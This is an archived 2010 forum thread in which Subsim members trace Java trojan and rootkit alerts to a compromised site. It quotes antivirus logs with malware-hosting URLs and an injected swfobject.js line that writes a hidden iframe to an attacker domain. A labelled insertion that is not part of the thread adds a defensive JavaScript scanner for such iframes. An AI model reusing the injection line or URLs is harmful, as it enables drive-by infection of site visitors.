View Full Version : java problem and more


Rhodes
09-28-10, 01:43 PM
Today, when opening a normal page here, I got a warning from my anti-virus that access would be denied because of a trojan virus, and the Java symbol popped up as if I had enabled the program.
Then, when going to Google and searching for a website, it took a long time, and when I clicked on the first link it went straight to another, completely different web page and my anti-virus went mad with all the trojans etc.

After running the AV, it detected some trojan in the Java program folder and other trojans in IE temp files, etc. After cleaning up, deleting all the temp files and running the AV a few times on selected folders, nothing.
After rebooting the PC, I went to Google to see if everything was fine. No, still the same thing.
Went looking for anything similar on the web, read about it on the Java site, cleaned the program cache, uninstalled and reinstalled after a reboot, etc.
But my Google page is the same. Any search takes a long time and the first click on any link sends me to a virus paradise.
Has anyone had a similar experience? Is the browser damaged in any way? I'm thinking of uninstalling IE8 and then reinstalling it, or installing Mozilla.

Any other access to sites is fine. MSN also, so it's not a slow internet connection.

PS: My antivirus is NOD32; I already ran CCleaner and Spybot!

HunterICX
09-28-10, 02:29 PM
What's the Virus identified as?

HunterICX

Gerald
09-28-10, 02:34 PM
Maybe a root-kit

DarkFish
09-28-10, 03:04 PM
Try uninstalling java, and then visit a google link (without java). Does it still send you to a virus site?

I'm thinking of uninstalling IE8 and then reinstalling it, or installing Mozilla.

I'd install Firefox anyway (less vulnerability to viruses etc. being one of its advantages)

Gerald
09-28-10, 03:18 PM
Starting in Safe Mode with Networking, to solve the problem

Rhodes
09-28-10, 04:51 PM
Starting in Safe Mode with Networking, to solve the problem

It's an idea. The anti-virus identified this:
28-09-2010 18:56:53 HTTP filter file http://86.55.211.118/phxop001/l.php?i=2 a variant of Win32/Kryptik.GZK trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:43 HTTP filter file http://rezamaj.co.cc/CVMGCi8JNBdZDYVED6LSiDs60HzgPdJh?s=samba& a variant of Win32/Kryptik.EWF trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:34 HTTP filter file http://rezamaj.co.cc/client.zip Java/TrojanDownloader.Agent.NBU trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Application Data\Microsoft\Windows\shell.exe.
28-09-2010 18:07:07 HTTP filter file http://mneboras.com/mneboras9/files/bobbystellar.jar multiple threats connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.
28-09-2010 18:07:04 HTTP filter file http://mneboras.com/mneboras9/files/java.jar Java/Exploit.Agent.NAL trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.

Many of the viruses came when Google redirected me.

I did some searching and it's a root-kit, and many people have/had this problem. Downloaded the removal tool from Kaspersky but it didn't find anything. Then downloaded, installed and ran Emsisoft Anti-Malware, but it didn't find anything.
Possibly do it again in safe mode.

Gerald
09-28-10, 04:59 PM
It's an idea. The anti-virus identified this:
28-09-2010 18:56:53 HTTP filter file http://86.55.211.118/phxop001/l.php?i=2 a variant of Win32/Kryptik.GZK trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:43 HTTP filter file http://rezamaj.co.cc/CVMGCi8JNBdZDYVED6LSiDs60HzgPdJh?s=samba& a variant of Win32/Kryptik.EWF trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:34 HTTP filter file http://rezamaj.co.cc/client.zip Java/TrojanDownloader.Agent.NBU trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Application Data\Microsoft\Windows\shell.exe.
28-09-2010 18:07:07 HTTP filter file http://mneboras.com/mneboras9/files/bobbystellar.jar multiple threats connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.
28-09-2010 18:07:04 HTTP filter file http://mneboras.com/mneboras9/files/java.jar Java/Exploit.Agent.NAL trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.

I did some searching and it's a root-kit. Downloaded the removal tool from Kaspersky but it didn't find anything. Then downloaded, installed and ran Emsisoft Anti-Malware, but it didn't find anything.
Possibly do it again in safe mode.

To clean up and get rid of the problem.

http://www.f-secure.com/en_EMEA/security/tools/online-scanner/

Rhodes
09-28-10, 05:11 PM
Already did it. In a Google support forum:
"then downloaded Kaspersky malware tool and finally got rid of it. What I found was a rootkit that was called TDL3, it's the third generation of TDSS which uses rootkit technology to hide itself on a system by infecting drivers like atapi.sys, iastor.sys and a few others. Atapi.sys is a common target for this rootkit because it loads early during the boot process and is difficult to detect. Common symptoms/signs of this infection include: Google redirection. Slowness of the computer and poor performance."

Trying to get some removal tool that works. Also read that in one case, the "bad guy" was in the router. Could this happen with a modem?

Gerald
09-28-10, 05:12 PM
Rhodes! To avoid this in the future, add some add-ons for Firefox (if you use that browser): NoScript, Adblock Plus, WOT, etc.

Rhodes
09-28-10, 05:27 PM
Possibly, but will try to fix this and use IE8. I am not certain that it will not happen in Firefox!

Gerald
09-28-10, 05:29 PM
As long as you have a connection to the Internet, you can get it all down, at worst. Therefore I propose real-time protection, updated at least once per hour, which is necessary, and if it has web scanning (removes viruses from web traffic), it is a plus. Here are links for the "bad thing":

http://www.bleepingcomputer.com/virus-removal/remove-tdss-tdl3-alureon-rootkit-using-tdsskiller

http://www.f-secure.com/weblog/archives/00001976.html

Rhodes
09-28-10, 05:34 PM
Yes, I'm reading those sites, but the removal tool didn't find it. Will run it in safe mode to see if it changes something. But I am beginning to lose faith....


PS: Gentlemen, the bugger is terminated, killed, destroyed, obliterated!!!!!!! :/\\x:

I tried what many people said had done the job, Hitman 3.5, and it did. 3 things: the bugger made my IE access the net by a proxy server (possibly one specific to it) and the program deleted one shell.exe file and svchost.exe file also. After rebooting, went to Google and had a normal and fast search and clicked on many sites, and it went there, no more virus paradise!

http://hitman-pro.en.softonic.com/ here's the link

Gerald
09-28-10, 06:00 PM
It can also be removed manually, by using the search in the Start menu:

http://www.f-secure.com/en_EMEA/products/technologies/blacklight/

http://www.tizersecure.com/about_TDL3_rootkit_detect_remove.php

http://forum.sysinternals.com/rootkit-tdl-3_topic21266_page1.html

http://hitmanpro.wordpress.com/2010/05/03/microsoft-cures-260-000-tdl3-infections/

http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html

Gerald
09-28-10, 06:04 PM
Yes, I'm reading those sites, but the removal tool didn't find it. Will run it in safe mode to see if it changes something. But I am beginning to lose faith....


PS: Gentlemen, the bugger is terminated, killed, destroyed, obliterated!!!!!!!

I tried what many people said had done the job, Hitman 3.5, and it did. 3 things: the bugger made my IE access the net by a proxy server (possibly one specific to it) and the program deleted one shell.exe file and svchost.exe file also. After rebooting, went to Google and had a normal and fast search and clicked on many sites, and it went there, no more virus paradise!

http://hitman-pro.en.softonic.com/ here's the link :up:

Rhodes
09-28-10, 06:06 PM
Forgot to thank everyone here for the help and support, :yeah::salute:Vendor!

Gerald
09-28-10, 06:22 PM
We can have a few beers in Funchal, since you have solved your PC problem. :()1:

Reece
09-28-10, 08:58 PM
I had almost the same thing with Java, it affected Firefox; every time I fired it up it tried to update some application, had to exit quickly. This was a while ago. I tried uninstalling Firefox and reinstalling, fired it up and the same thing started; both Avira and Ad-Aware didn't find anything, so I just saved my Outlook Express, game saves etc. then re-ghosted my machine, best thing in the long run I reckon! :yep:

HunterICX
09-29-10, 04:00 AM
Same here, had a similar malware that injected itself into some key system files, mostly in the System32 folder, so the virus just wouldn't die until I did some heavy cleaning and restoring. A bit frustrating, and it really made me want to hurt people that create this kind of garbage.

HunterICX

Gerald
09-29-10, 04:08 AM
And what they get paid, to develop PC infections

Rhodes
09-29-10, 04:37 AM
Indeed. But now, I opened this thread and got the same virus from the first time detected by NOD32 and the Java console popped up. But it's strange, subsim is not infected! I am not seeing any site apart from this.

PS: 29-09-2010 10:34:24 HTTP filter file http://drerlre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.
It was this that appeared!

HunterICX
09-29-10, 05:11 AM
:hmmm: Odd, seems there are some traces left that are enough to restore the whole virus.

I would do the following -

Disconnect the Internet
Do a full clean sweep with the scanners you have installed, use the tools you can find to get rid of the specific virus.
(perhaps Uninstall JAVA again and reinstall later when you have internet restored and there's no traces to be found of the virus)
perhaps you might want to tighten your security (enable Windows Firewall)
restore internet connection.

btw are you using Firefox yet? If not, get it and use the No-Script plug-in.
Also CCleaner is a nice tool, I use it every time before I close down my PC so it's fresh at start-up.

also on the bottom of this page are 2 links to fix the vulnerability in Java: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan%3AJava%2FMugademel.A&threatid=2147637327

HunterICX

Gerald
09-29-10, 05:34 AM
No-Script is a good choice and firefox of course

Rhodes
09-29-10, 05:46 AM
Thanks. No, I still use IE8!

PS: Did a full scan without my internet connection enabled and nothing. Scanned with the program that erased the malware, nothing also.

Came here and had the anti-virus pop-up window about the same zip file trying to get in. I do not get it. On the one hand, this site has a Java virus that etc, etc, etc. On the other hand, this never happened here and this forum is one of the safest that I know.
Well, if it's detected and it does not enter my PC and infect it, it's fine!
Damn those who invented such things...

SeaWolf U-57
09-29-10, 10:05 AM
Today when I logged into SubSim I was told I needed to install Java. OK, never had that before.
And then the next time I went to log in, my NOD32 antivirus software went crazy and warned me that this site was trying to send Trojans to my computer.
What gives :nope:

HunterICX
09-29-10, 11:15 AM
my scanners have kept quiet and so did Java.
@Work : AVG
@Home : Avast

I think you ran into a malware that exploits the vulnerability of Java and infests it.
They just hit you at random, mostly through banners, ads and scripted advertising.

has NOD32 been able to identify the malware? and what web browser are you using?

EDIT: someone else on this forum caught the same problem when visiting a different website:
http://www.subsim.com/radioroom/showthread.php?t=175495

HunterICX

SeaWolf U-57
09-29-10, 12:50 PM
I found this in my quarantine folder of Nod32; it was never allowed to install :nope:


29/09/2010 …. drerlre.co.cc/client.zip… java/TrojanDownloader.agent.NBU trojan
29/09/2010 … drerlre .co.cc/1.zip ….. A variant of java/Mugade


(I removed the http:// to stop them being active links)


I connected using my Firefox browser :nope:

Edit ...... why did subsim ask for java to be installed in the first place ???

Jimbuna
09-29-10, 01:17 PM
Nothing to do with SS but I upgraded a Java applet about a month ago and ended up having to reformat a machine :nope:

SeaWolf U-57
09-29-10, 02:04 PM
Nothing to do with SS but I upgraded a Java applet about a month ago and ended up having to reformat a machine :nope:



Hhmmm OK, but I just un-installed Firefox and ran some Hitman software that found nothing, but would not un-install again.
So restored my machine to before today’s Java update, checked all was OK, then started up IE 64-bit version, checked around the sites I used, no problems so far.
But opened the SubSim forum and, you guessed it, these pages use a version of Java to view them. NFW am I doing that again; the pages load OK without it :nope:

SeaWolf U-57
09-29-10, 02:20 PM
I hit the red cross on the up-date and left the forum and just returned but the message did not re-appear :up:

JScones
09-30-10, 04:20 AM
I started getting this message this afternoon. Now it pops up every time I touch this site, and ONLY this site.

http://img822.imageshack.us/img822/2881/viruswarning.jpg

JScones
09-30-10, 04:21 AM
I started getting this message this afternoon. Now it pops up every time I touch this site, and ONLY this site.

http://img822.imageshack.us/img822/2881/viruswarning.jpg

Gerald
09-30-10, 04:38 AM
HTTP cookie or first-party session cookies. These are temporary cookies set by the website being visited (the first-party). Cleared when the browser is closed.

First-party persistent cookies. These are permanent cookies set by the website being visited (the first-party). They are permanently stored and will be retained until their requested expiration date and time, or until they are manually deleted through some user action.

Third-party session cookies. These are temporary cookies that are not set by the first-party, but rather by some other "third-party" web server.

Third-party persistent cookies. These are permanent cookies that are stored permanently; they will be retained until they are manually deleted through some user action. These are the worst of all cookies, since they are typically planted into a user's browser without the user's knowledge, permission, or expectation, after which time they can be, and are, used to track users across the Internet, compiling profiles of sites visited, search queries used, and collecting all manner of personal and private information.

Flash cookies = an entirely different form of "cookie" that is not handled by browser settings (by normal 'cookie' protocol) and that must be dealt with by entirely different methods.

Advertisers (and other unscrupulous parties) have managed to trick your browser into revealing information about you & your surfing habits (and more) with these 3rd party cookies (and lately "flash cookies"). These are the ones that many anti-malware scans turn up as 'spyware' or worse. You should always block these, as they are hardly ever needed by anyone. Settings are usually set in your browser's 'Privacy' section.

HunterICX
09-30-10, 04:50 AM
seems that the drerlre.co.cc is the culprit...will notify Neal about this.

thank you Seawolf & JScones for the reports

HunterICX

Gerald
09-30-10, 05:00 AM
Are usually seen in,
I looked at the scripts that were running, and someone snuck something into their /js/swfobject.js file:

document.write('<iframe width=2 height=1 frameborder=0 src="http://drerlre.co.cc/zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza"></iframe>');

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AWin32%2FPdfjsc.IP&ThreatID=-2147328635

Use Flashblock on almost every site. That redirects to a 404 now, and it looks like their swfobject.js has been fixed, but I'm assuming that was the culprit.
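
Added example (not part of the thread and not the site's own code): a static check a site owner could run over served .js files to catch the kind of change described above, a document.write that plants a near-invisible iframe pointing at a host the site does not control. SITE_HOSTS, SITE_BASE, MAX_HIDDEN_PX and the sample script are assumptions constructed for illustration; the check also joins string literals split with '+', which goes slightly beyond the single case quoted in the post.

```javascript
// Added example: flag iframes that a static script writes into the page.
// SITE_HOSTS, SITE_BASE and MAX_HIDDEN_PX are assumptions; adjust per site.
const SITE_HOSTS = new Set(["forum.example.test"]);
const SITE_BASE = "http://forum.example.test/";
const MAX_HIDDEN_PX = 5; // width/height at or below this counts as hidden

// Constructed sample: tail of a script with benign and injected lines.
const SAMPLE_JS = `/* constructed sample, not real site code */
var swfobject = { embed: function (id) { return document.getElementById(id); } };
document.write('<iframe width=2 height=1 frameborder=0 src="http://injected.example.net/aBcD1234"></iframe>');
document.write('<ifr'+'ame style="display:none" src="//cdn.example.org/x"></ifr'+'ame>');
document.write('<iframe width="560" height="315" src="/player/embed.html"></iframe>');
document.write('<iframe width=560 height=315 src="https://video.example.com/embed/1"></iframe>');`;

// Undo two cheap tricks that hide a tag from a plain text search.
function normalizeLine(line) {
  return line
    .replace(/(["'])[ \t]*\+[ \t]*\1/g, "") // '<ifr'+'ame' -> '<iframe'
    .replace(/\\(["'])/g, "$1");            // \" -> "
}

// Parse HTML attributes (quoted or bare values) from one opening tag.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] || m[3] || m[4] || "";
  }
  return attrs;
}

// Return one finding per iframe whose src resolves to a host outside
// SITE_HOSTS. "suspicious" = external and hidden; "review" = external only.
function scanScript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((raw, idx) => {
    const line = normalizeLine(raw);
    const tags = line.match(/<iframe\b[^>]*>/gi) || [];
    for (const tag of tags) {
      const attrs = parseAttrs(tag);
      if (!attrs.src) continue;
      let host;
      try {
        // Relative and protocol-relative URLs resolve against the site.
        host = new URL(attrs.src, SITE_BASE).hostname;
      } catch (e) {
        host = "(unparseable)";
      }
      if (SITE_HOSTS.has(host)) continue;

      const reasons = ["external host " + host];
      const w = parseInt(attrs.width, 10);
      const h = parseInt(attrs.height, 10);
      let hidden = false;
      if (w <= MAX_HIDDEN_PX || h <= MAX_HIDDEN_PX) {
        hidden = true;
        reasons.push("near-zero size");
      }
      if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || "")) {
        hidden = true;
        reasons.push("hidden by style");
      }
      if (/document\.write(ln)?\s*\(/.test(line)) {
        reasons.push("written via document.write");
      }
      findings.push({
        line: idx + 1,
        host: host,
        verdict: hidden ? "suspicious" : "review",
        reasons: reasons,
      });
    }
  });
  return findings;
}

for (const f of scanScript(SAMPLE_JS)) {
  console.log(`line ${f.line}: ${f.verdict} (${f.reasons.join("; ")})`);
}
```

Running it against a known-good copy of each script and diffing the findings after every deploy turns a silent edit into an alert.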

Gerald
09-30-10, 05:13 AM
Just as it is, a culprit!

Rhodes
09-30-10, 06:41 AM
Yep. Got the same message on entering subsim again. I think that is to do with some of the advertising. I think it is this, since I got Portuguese adverts

"http://pagead2.googlesyndication.com/pagead/imgad?id=COW2hKP2_YDuvAEQ1AMYPDIIr-5DB0kEKXo"

But NOD says that the connection is terminated and so, possibly I am safe for the moment!

So vendor, I heard that you are buying the beers...:()1:

Gerald
09-30-10, 06:50 AM
Yep. Got the same message on entering subsim again. I think that is to do with some of the advertising. I think it is this, since I got Portuguese adverts

"http://pagead2.googlesyndication.com/pagead/imgad?id=COW2hKP2_YDuvAEQ1AMYPDIIr-5DB0kEKXo"

But NOD says that the connection is terminated and so, possibly I am safe for the moment!

So vendor, I heard that you are buying the beers...:()1:

You "only" need to fly from Lisbon to Funchal, :yep:

Onkel Neal
09-30-10, 07:15 AM
Ok, I have hired a server security expert to check the server thoroughly and see what's up.

Dowly
09-30-10, 07:21 AM
No problems on my end, both FF and Avast find nothing.

Onkel Neal
09-30-10, 07:28 AM
Ok, I have Scott setting up a full security check. I have not gotten any alerts from my Norton AV but when several people report this, I take it very seriously. Thanks! Will report back asap.

Neal

SeaWolf U-57
09-30-10, 07:29 AM
Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it :hmmm:

SeaWolf U-57
09-30-10, 08:00 AM
Indeed. But now, I opened this thread and got the same virus from the first time detected by NOD32 and the Java console popped up. But it's strange, subsim is not infected! I am not seeing any site apart from this.

PS: 29-09-2010 10:34:24 HTTP filter file http://drerlre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.
It was this that appeared!


Take a look in the Nod32 Quarantine folder; you will see the files that tried to infect your machine. Thank god they weren’t opened.
My version of Nod32 also rejected the connection and install
Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it :nope:
I didn't see this thread so I opened this one

http://www.subsim.com/radioroom/showthread.php?t=175533

stabiz
09-30-10, 08:18 AM
My avast was going bonkers too, only the main page of subsim forums.

SeaWolf U-57
09-30-10, 08:26 AM
It's strange how some did and some didn’t. I wonder if it's something to do with the rotation of the adverts; maybe only one is infected :hmmm:

Gerald
09-30-10, 08:49 AM
I found this in my quarantine folder of Nod32; it was never allowed to install :nope:


29/09/2010 …. drerlre.co.cc/client.zip… java/TrojanDownloader.agent.NBU trojan
29/09/2010 … drerlre .co.cc/1.zip ….. A variant of java/Mugade


(I removed the http:// to stop them being active links)


I connected using my Firefox browser :nope:

Edit ...... why did subsim ask for java to be installed in the first place ???

Java controls a crucial factor in the OS, but if you add some add-on, and adjust the configuration of which sites you trust, then this is just a memory

SeaWolf U-57
09-30-10, 08:59 AM
As you see, Nod32 did this for me
I won't ever have this problem again :up:

Gerald
09-30-10, 09:05 AM
Good news, :yep:

Dowly
09-30-10, 09:13 AM
Avast recognizes the trojan too, just went to the site mentioned (yes, I'm a bit nutty) and Avast started yelling "Avast! There be a scurvy man-o-war off yar starboard bow!" and aborted the connection. :yep:

Onkel Neal
09-30-10, 09:42 AM
OK, I have edited a piece of code that may have been causing this problem.

From this point in time forward, let me know here if this problem pops up. Details are helpful, thanks a bunch, guys. :salute:

Rhodes
09-30-10, 12:32 PM
I was wondering where this thread had gone...

But when replying to a pm I got the same warning again.
30-09-2010 18:18:39 HTTP filter file http://drejrre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.

and

Emsisoft Anti-Malware - Version 5.0
IDS log
Date PID Source Event Behavior/Infection
30-09-2010 18:18:51 0 C:\DOCUMENTS AND SETTINGS\ADMINISTRADOR\DEFINIçõES LOCAIS\TEMP\JAR_CACHE7195392806923462976.TMP Quarantined by User Trojan-Downloader.Java.Agent!IK
30-09-2010 18:18:40 0 C:\DOCUMENTS AND SETTINGS\ADMINISTRADOR\DEFINIçõES LOCAIS\TEMP\JAR_CACHE1712967037496492837.TMP Quarantined by User Trojan-Downloader.Java.Agent!IK

I'm beginning to think that my XP (or my AV/anti-malware software) does not like subsim...

Gerald
09-30-10, 12:42 PM
I had an attempted attack discovered now myself, but web scanning of network traffic was such that there was not a problem any more

Rhodes
09-30-10, 12:58 PM
They are out there.... (X-files theme music now)

Gerald
09-30-10, 01:08 PM
Hmmm, yes it seems to be a lot of beer until the matter is investigated :o

Rhodes
10-01-10, 04:59 AM
Hmmm, yes it seems to be a lot of beer until the matter is investigated :o

Indeed! Every first time that I log in to subsim, the bugger tries to get in.

SeaWolf U-57
10-01-10, 08:21 AM
Have you cleared your recent history including your cookies :hmmm:

Rhodes
10-01-10, 09:54 AM
Have you cleared your recent history including your cookies :hmmm:

Yes and it happens every time I connect for the first time in the day to subsim. Then after the block by the anti-virus, I do not have any messages again!

Onkel Neal
10-01-10, 06:14 PM
Is anyone else seeing this? My AV is not making a peep now.

JScones
10-01-10, 06:41 PM
I'm not getting it now. Did your security guy find a problem?

KeineK
10-01-10, 08:06 PM
Yes, I just had my AV pop up again.

stringy
10-02-10, 01:53 AM
I had the same problem with Avast giving me malicious threat warnings when entering the site but all seems well now. No issues for the last couple of days. Looks like Subsim's pest control cracked this one :up:.

Rhodes
10-02-10, 05:05 AM
Now was fine, no av pop up. May the bugger be gone forever!:salute:

Vendor will pay for the beers...;)

Onkel Neal
10-02-10, 09:19 AM
I'm not getting it now. Did your security guy find a problem?

I am waiting for his report... for $100 an hour you would think they would put a little more steam into their engine :stare:

KeineK
10-02-10, 11:33 AM
I'm still getting it on the Silent Hunter III subforum, but not anywhere else.

Rhodes
10-02-10, 12:50 PM
I am waiting for his report... for $100 an hour you would think they would put a little more steam into their engine :stare:


$100 an hour??????????:huh::huh::huh::huh::o

Jimbuna
10-02-10, 04:04 PM
$100 an hour??????????:huh::huh::huh::huh::o

That is not that expensive...believe me.

IT gurus in the UK can charge even more.

SeaWolf U-57
10-04-10, 04:57 AM
Damn it, it's back. This site requires Java to view. Monday 4th October
Not even going to try installing it and see what happens



I don't know if this helps but I was not logged in :hmmm:

HunterICX
10-04-10, 05:13 AM
Could you make a screenshot of that ''Need Java to view this site'' message the next time you get it?

HunterICX

Herr-Berbunch
10-04-10, 05:14 AM
It hadn't affected me, but I was aware of it from other posts from last week. And then when I opened subsim.com this morning AVG picked up some trojan (or so it thought). No other signs though, and I'm clean!

Found the log:

Infection: Trojan horse Exploit_c.KGS

Object: c:\Users\tony\AppData\Local\Temp\plugtmp-5\plugin-zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza

Good luck Neal, hope it doesn't cost too much :nope:

SeaWolf U-57
10-04-10, 05:34 AM
Could you make a screenshot of that ''Need Java to view this site'' message the next time you get it?

HunterICX


If I get it again I will
Just for information I have just re-installed this computer and opened SubSim for the first time today although I have been on other site with no problem today.
Anyway I got the normal add plug in … flash player 10.1 which I always do BUT today it also asked me to add Java add-on also. :nope:

Catfish
10-04-10, 07:22 AM
Hello,
since today I always get a red screen with a warning "Unsecure website", when trying to access the Subsim.com forum.
It happens all the time, even if being logged in, or just wanting to change to another topic, or subforum. Annoying, problems on my side / PC?

thanks and greetings,
Catfish

Herr-Berbunch
10-04-10, 07:39 AM
Check out this other thread...

http://www.subsim.com/radioroom/showthread.php?t=175495

I'm guessing it's all associated :nope:

Ignore this post, it's been merged and is irrelevant in this thread as it points to this thread.

Onkel Neal
10-04-10, 09:22 AM
Hello,
since today I always get a red screen with a warning "Unsecure website", when trying to access the Subsim.com forum.
It happens all the time, even if being logged in, or just wanting to change to another topic, or subforum. Annoying, problems on my side / PC?

thanks and greetings,
Catfish


What AV are you running? I have Norton with the latest updates and I am not seeing this.

Onkel Neal
10-04-10, 09:30 AM
Damn it, it's back. This site requires Java to view. Monday 4th October
Not even going to try installing it and see what happens



I don't know if this helps but I was not logged in :hmmm:

That is not the same as a virus or trojan warning, mate. It simply means to view java on any website you need to have java installed.

SeaWolf U-57
10-04-10, 10:19 AM
Thank you for this information
But if you had not merged the Threads my first post would have been #24 of this post
Which may not be as clear as it should be … first you get the message to install Java, then when you return to the site all hell breaks out with my anti-virus.

Can I ask what you have added to the forum that now requires a java update because
This is only being asked for on your site since the first signs of the Trojans.
Surely you know if there is something new you have added that now requires or doesn’t require Java
And as you have stated many sites use java but you don’t get a string of Trojans following the download.
It feels like a case of shooting the messenger here
So I will bow out of this thread :shifty:

Onkel Neal
10-04-10, 11:03 AM
You still have not said what your AV is. What browser are you using? I'm trying to see what the problem is but I need more information. I have the latest fully paid for version of Norton, and it is not indicating any problems.

And I am not being "touchy" about this, but you need to understand, if I cannot find anything wrong, if a professional IT guy cannot find anything wrong, then what do you expect me to do? For all I know, this could be a non-Subsim problem with Nod32 creating false positives. It has happened before. (http://www.nist.org/news.php?extend.267) Help me out here, I need proper reports! ;)

SeaWolf U-57
10-04-10, 11:12 AM
The Anti Virus program is Eset Smart Security Version 4.0.467.0 (Nod32)
The virus signature database is 5503 (20101004)

It has happened using both FireFox and IE

Onkel Neal
10-04-10, 11:23 AM
For all I know, this could be a non-Subsim problem with Nod32 creating false positives. It has happened before. (http://www.nist.org/news.php?extend.267) Help me out here, I need proper reports! ;)

The Anti Virus program is Eset Smart Security Version 4.0.467.0 (Nod32)
The virus signature database is 5503 (20101004)

It has happened using both FireFox and IE

Roger that, thanks! :salute:

Dowly
10-04-10, 11:25 AM
Boggles the mind. :hmmm:

I've had no issues with either having to update Java nor the trojan we had earlier. Maybe this is a localised issue?

Avast & Firefox here.

SeaWolf U-57
10-04-10, 11:43 AM
Boggles the mind. :hmmm:

I've had no issues with either having to update Java nor the trojan we had earlier. Maybe this is a localised issue?

Avast & Firefox here.


That would be a good point, except it only happened on Subsim forums
And not all the time; it's usually in the morning BST and then not for the rest of the day
Even if you clear your history and re-install Nod32 it won't find anything until the next morning when you first enter the forum. :stare:

SeaWolf U-57
10-04-10, 11:50 AM
I will do a little test …. I will remove my anti-virus and un-install all the browsers; this will clear all log files. Then I will enter only Subsim forums until the pop-up appears and then I will report here if this happens. I will update Java and see what the result of this is this time. :stare:

SeaWolf U-57
10-04-10, 03:53 PM
Did a total restore of the machine, i.e. formatted the hard drive, re-installed Windows, installed system software including Nod32.
Installed Firefox then opened Subsim; it didn’t ask for a Flash Player update or the Java update this time.
Also I see the adverts are not changing tonight :DL

RickC Sniper
10-04-10, 06:28 PM
I am getting the unsafe website popup that JScones posted with IE8 but not with Firefox.

Windows 7 just using Microsoft security essentials.

Catfish
10-05-10, 06:33 AM
Hi Neal,

What AV are you running? I have Norton with the latest updates and I am not seeing this.

I am running HBEDV "Avira", SpyBot TeaTimer in the background, and occasionally use Ad-Aware, MalwareBytes and a2emergencykit, the latter only against trojans. No threats detected by any of the programs.

Using WinXP here, and IE 8; all updates installed. IE8 tells me that the "SmartScreen Filter" has detected this site as unsafe.

It does not happen with Firefox version 3.5.6.

Greetings,
Kai

SeaWolf U-57
10-05-10, 06:53 AM
I wonder if, like me, you have recently re-installed your machine, and then when entering SubSim clicked “Yes” to installing Flash Player 10.1, and then you were asked to add the Java update. If so, this may explain a lot.
Because it looks like Subsim may not have known that the link they offered to add this Flash Player may have contained a little added program. Please see below:

http://img835.imageshack.us/img835/4839/captureflasplayer.png

That could be why some have seen this and a lot have not.

Edit ... if you clicked the link you would not have seen this screen; it would just have run the update, opening the door to the trojans

Dowly
10-05-10, 07:01 AM
Also I see the adverts are not changing tonight :DL

What ads? I don't have any ads. :doh: Only the amazon linky on top-right corner and the navyfield ad. This with both FireFox and IE, the latter being virtually untouched so I haven't blocked the ads.

One of the ads might be causing the issues. :hmmm:

SeaWolf U-57
10-05-10, 07:39 AM
What ads? I don't have any ads. :doh: Only the amazon linky on top-right corner and the navyfield ad. This with both FireFox and IE, the latter being virtually untouched so I haven't blocked the ads.

One of the ads might be causing the issues. :hmmm:

As I just stated in the post above yours, when you install Flash Player the adverts change, but they don't now :up:

Dowly
10-05-10, 07:45 AM
As I just stated in the post above yours, when you install Flash Player the adverts change, but they don't now :up:

But I have Macromedia's flash player installed. :hmmm: Haven't had any other ads in awhile apart from the two I mentioned earlier.

SeaWolf U-57
10-05-10, 08:25 AM
But I have Macromedia's flash player installed. :hmmm: Haven't had any other ads in awhile apart from the two I mentioned earlier.

Yes as did I for a long time this has only started when I re-installed my machine last Thursday I think :up:

Onkel Neal
10-05-10, 08:27 AM
It's possible that the changes in whatever java the flash ads were running is triggering some AV, so I disabled it yesterday until the techs finish their work.

SeaWolf U-57
10-05-10, 08:33 AM
It's possible that the changes in whatever java the flash ads were running is triggering some AV, so I disabled it yesterday until the techs finish their work.

It looks like the prime suspect as nothing is showing today
And as you see from the above picture disabling it could well be the solution :up:

Catfish
10-05-10, 10:57 AM
Hello,

6 p.m. here in Germany , all works now, no red screen anymore.

Seems it has something to do with the Java-pumped ads (?). I have written to MS (where this red unsafe screen obviously comes from) that the Website itself sure is not an unsafe one :)

Greetings,
Kai

Herr-Berbunch
10-05-10, 02:26 PM
Looks ok here too today. Fingers crossed.

RickC Sniper
10-05-10, 05:00 PM
I came here today and got the unsafe website warning again with IE8 but then after cleaning out my history and temp files it did not show up.



So...this was a website issue and my pc should not have been affected?


I ran a scan of my pc and it found nothing but I realize my AV isn't top-of-the-line. (MS Security Essentials)
